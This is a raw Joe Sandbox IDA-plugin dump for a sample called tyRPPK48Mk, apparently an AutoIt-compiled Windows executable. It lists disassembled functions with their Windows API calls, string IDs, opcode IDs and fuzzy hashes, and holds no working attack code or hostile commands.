• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: SendString$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 369157077-1007645807
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3052893215-2127371420
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295938435-2354261254
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3038501623-2263619337
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295938435-8599901
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1834419854-3405671355
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 00454074
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 455036304-4153970271
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2170234536-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 136442275-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
